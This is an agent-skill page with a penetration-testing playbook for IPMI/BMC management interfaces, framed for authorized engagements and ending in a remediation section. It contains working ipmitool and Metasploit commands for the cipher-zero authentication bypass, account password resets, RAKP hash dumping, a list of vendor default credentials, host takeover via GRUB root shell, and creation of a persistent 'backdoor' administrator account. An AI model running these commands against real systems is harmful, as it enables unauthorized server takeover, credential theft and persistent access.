pentesting-ipmi

star 599

Testing IPMI / BMC out-of-band management interfaces (default 623/UDP, sometimes TCP) for the cipher-zero authentication bypass, RAKP password-hash retrieval, anonymous/default BMC credentials, cleartext password storage, and host takeover via KVM/SOL during authorized engagements.

xalgord By xalgord schedule Updated 6/6/2026
play_arrow Run Skill in Manus View GitHub

name: pentesting-ipmi description: Testing IPMI / BMC out-of-band management interfaces (default 623/UDP, sometimes TCP) for the cipher-zero authentication bypass, RAKP password-hash retrieval, anonymous/default BMC credentials, cleartext password storage, and host takeover via KVM/SOL during authorized engagements. domain: cybersecurity subdomain: network-services-pentesting tags:

  • penetration-testing
  • network-services
  • ipmi version: '1.0' author: xalgorix license: Apache-2.0

Pentesting IPMI (port 623)

When to Use

  • Default port 623/udp (sometimes 623/tcp) on Baseboard Management Controllers (BMC) — Supermicro, Dell iDRAC, HP iLO, IBM IMM, Fujitsu iRMC, Oracle/Sun ILOM, ASUS iKVM.
  • When nmap/scanners show asf-rmcp/ipmi on 623, or you find an out-of-band management LAN.
  • BMCs run independent of the host OS/power state, so compromise = persistent, OS-independent control of the server (power, KVM, serial-over-LAN, virtual media).

Quick Enumeration

# Find the port (UDP is primary)
nmap -n -p 623 10.0.0.0/24
nmap -n -sU -p 623 10.0.0.0/24

# Version identification
nmap -sU --script ipmi-version -p 623 10.10.10.10
msf > use auxiliary/scanner/ipmi/ipmi_version

# Install the client
apt-get install ipmitool

Critical: Checks Most Often Missed

  • Cipher type 0 (cipher-zero) auth bypass — IPMI 2.0 flaw (Dan Farmer): with a valid username, any password is accepted. Found across HP, Dell, Supermicro BMCs. List and modify users, including resetting passwords:
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list                 # any password works
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
  • RAKP password-hash retrieval — the IPMI 2.0 RAKP handshake returns a salted hash (HMAC-MD5/SHA1) for any existing username; crack it offline:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
  • Anonymous access — many BMCs ship with a null username/password account that can reset named accounts:
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
  • Default credentials — Dell iDRAC root:calvin, IBM IMM USERID:PASSW0RD (zero), Supermicro ADMIN:ADMIN, Oracle/Sun ILOM root:changeme, ASUS iKVM admin:admin. (HP iLO uses a factory-randomized 8-char password.)
  • Cleartext password storage — Supermicro stores IPMI passwords in /nv/PSBlock or /nv/PSStore; readable once you reach the BMC filesystem. Supermicro's UPnP SSDP listener (UDP 1900) had a root-RCE bug (exploit/multi/upnp/libupnp_ssdp_overflow).

How to CONFIRM

  • Cipher-zero: auxiliary/scanner/ipmi/ipmi_cipher_zero reports VULNERABLE, or ipmitool ... -C 0 ... user list returns the user table with a wrong password.
  • Hash dump: ipmi_dumphashes outputs crackable hmac hashes per username.
  • Anonymous: ipmitool -U '' -P '' user list returns the user table.
  • Defaults: a documented vendor cred logs in (user list succeeds).

Workflow

Step 1: Enumerate

Sweep 623/udp, identify IPMI version and vendor (ipmi-version). Vendor tells you which default creds and storage paths to try.

Step 2: Authenticate / unauth access

Run cipher-zero and anonymous checks first (no creds needed). Dump RAKP hashes for every known username and crack offline (hashcat). Try vendor default creds.

Step 3: Exploit / Extract

  • With cipher-zero or recovered creds, enumerate and reset accounts via ipmitool -I lanplus.
  • Crack dumped RAKP hashes to recover real BMC passwords.
  • On Supermicro, read stored cleartext passwords (cat /nv/PSBlock) once on the BMC.

Step 4: Post-access / pivot

Administrative BMC access => host takeover:

  • KVM / virtual media: reboot host into a root shell via GRUB (init=/bin/sh) or boot a rescue ISO to manipulate the host disk (insert backdoor, extract data).
  • Serial-over-LAN (SOL): take over a logged-in physical/serial console via ipmitool ... sol.
  • Persistent backdoor account (works from a compromised host's local BMC interface, no auth):
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4          # 4 = ADMINISTRATOR
ipmitool user list

Key Concepts

Concept Description
BMC Baseboard Management Controller — independent micro-controller running IPMI; survives OS/power state
Cipher 0 IPMI 2.0 cipher suite that disables auth — any password accepted for a valid user
RAKP IPMI 2.0 auth handshake that leaks a crackable salted password hash per username
lanplus (-I lanplus) ipmitool interface for IPMI 2.0 over LAN (RMCP+)
SOL / KVM Serial-over-LAN and remote keyboard/video/mouse — full host console control
Anonymous login Null user/pass account enabled by default on many BMCs

Tools & Systems

Tool Purpose
ipmitool Primary client: user mgmt, SOL, KVM, password reset (-I lanplus -C 0)
nmap ipmi-version NSE Version/vendor fingerprint on 623/udp
Metasploit ipmi_cipher_zero Detect cipher-zero auth bypass
Metasploit ipmi_dumphashes Retrieve RAKP password hashes
Metasploit ipmi_version Scanner for IPMI version
hashcat Crack dumped RAKP HMAC-MD5/SHA1 hashes

Common Scenarios

Scenario 1: Cipher-zero full control

A Supermicro BMC is cipher-zero vulnerable; ipmitool -C 0 lists users and resets root, granting KVM/SOL access and a host reboot into a root shell.

Scenario 2: Hash dump and crack

ipmi_dumphashes pulls the RAKP hash for ADMIN; hashcat recovers the password, which is reused on the host SSH/web interfaces.

Scenario 3: Default creds to host takeover

A Dell iDRAC accepts root:calvin; virtual media mounts a rescue ISO and a backdoor is written to the host filesystem.

Output Format

## IPMI / BMC Finding

**Service**: IPMI (623/udp)
**Severity**: <Critical|High>
**Target**: <IP>:623  Vendor/Version: <Supermicro | iDRAC | iLO ...> IPMI 2.0

### Evidence
- Cipher-zero auth bypass: VULNERABLE (user list returned with bogus password)
- RAKP hashes dumped for users: <ADMIN, root, ...> (cracked: <yes/no>)
- Anonymous/default creds: <'' / root:calvin> accepted
- Host impact: KVM/SOL access; backdoor account 'backdoor' (ADMINISTRATOR) added

### Reproduction
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H <IP> -U root -P anything user list

### Recommendation
1. Disable cipher suite 0 on all BMCs
2. Isolate BMCs on a dedicated management VLAN, never Internet-facing
3. Replace default/anonymous credentials; enforce strong unique BMC passwords
4. Patch BMC firmware (Supermicro UPnP/SSDP); restrict RAKP exposure
5. Disable unused KVM/SOL/virtual-media features
Install via CLI
npx skills add https://github.com/xalgord/xalgorix --skill pentesting-ipmi
Repository Details
star Stars 599
call_split Forks 104
navigation Branch main
article Path SKILL.md
More from Creator
xalgord
xalgord Explore all skills →